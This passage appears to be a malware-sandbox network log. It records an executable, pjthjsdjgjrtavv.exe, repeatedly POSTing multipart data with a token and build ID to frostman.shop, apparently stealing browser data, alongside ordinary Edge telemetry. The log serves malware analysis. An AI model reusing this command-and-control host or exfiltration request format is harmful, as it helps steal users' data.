                                                                                                                                                                                                                                                                              Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d
                                                                                                                                                                                                                                                                              Data Ascii: ( 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a
                                                                                                                                                                                                                                                                              Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e
                                                                                                                                                                                                                                                                              Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89
                                                                                                                                                                                                                                                                              Data Ascii: ODsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 49858 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:45 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ZCJMOPPPH4EUAIEK6PHL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------ZCJMOPPPH4EUAIEK6PHL
Content-Disposition: form-data; name="token"

4971dbaed128343936d3c1f60719f3d9
------ZCJMOPPPH4EUAIEK6PHL
Content-Disposition: form-data; name="build_id"

2029121d70cd0f691aa23f374badb32f
------ZCJMOPPPH4EUAIEK6PHL
Cont
2024-12-20 06:31:47 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 49870 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:47 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IMO8YUKFUSJM7YMOPPPH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------IMO8YUKFUSJM7YMOPPPH
Content-Disposition: form-data; name="token"

4971dbaed128343936d3c1f60719f3d9
------IMO8YUKFUSJM7YMOPPPH
Content-Disposition: form-data; name="build_id"

2029121d70cd0f691aa23f374badb32f
------IMO8YUKFUSJM7YMOPPPH
Cont
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                              Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-20 06:31:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 49880 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:49 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3ECTJEK689RQQIMOZM7Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:49 UTC | 16355 | OUT | Data Ascii: ------3ECTJEK689RQQIMOZM7YContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------3ECTJEK689RQQIMOZM7YContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------3ECTJEK689RQQIMOZM7YCont
2024-12-20 06:31:51 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 49845 | 18.165.220.110 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:50 UTC | 925 | OUT | GET /b?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                              Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-20 06:31:50 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                              Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                              Location: /b2?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                              set-cookie: UID=139bc9b74b908404e24257b1734676310; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                              set-cookie: XID=139bc9b74b908404e24257b1734676310; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                              X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                              Via: 1.1 a95adf7afe468fe543cb5750140a2bfa.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                              X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                              X-Amz-Cf-Id: pG9eeLPUKgLr1syF78Lzc5Z2ByU2ke6iExjZp0sTzZg6AYHCFQVA0w==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 49897 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:51 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----CT2VAIM79H4EU3E37GL6
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 131557
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 54 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 54 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 43 54 32 56 41 49 4d 37 39 48 34 45 55 33 45 33 37 47 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------CT2VAIM79H4EU3E37GL6Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------CT2VAIM79H4EU3E37GL6Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------CT2VAIM79H4EU3E37GL6Cont
2024-12-20 06:31:53 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:52 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
2024-12-20 06:31:53 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 49899 | 20.42.65.90 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:51 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680546564&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                              Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 3810
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: _C_ETH=1; USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1
2024-12-20 06:31:51 UTC | 3810 | OUT | Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 37 3a 34 32 3a 32 36 2e 35 35 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 33 65 65 30 37 66 33 2d 36 36 65 61 2d 34 36 31 37 2d 61 38 35 64 2d 66 30 30 63 32 30 38 37 61 37 31 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 33 30 39 31 34 36 38 38 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                              Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-20T07:42:26.559Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"locale
2024-12-20 06:31:53 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                              Set-Cookie: MC1=GUID=66ee8fe110d74100a7764a8f021547e5&HASH=66ee&LV=202412&V=4&LU=1734676313015; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:53 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              Set-Cookie: MS0=ecad6973803e4563b5f0fe2bb108ad9f; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:53 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              time-delta-millis: -4233549
                                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:52 GMT
                                                                                                                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 49910 | 18.173.219.113 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
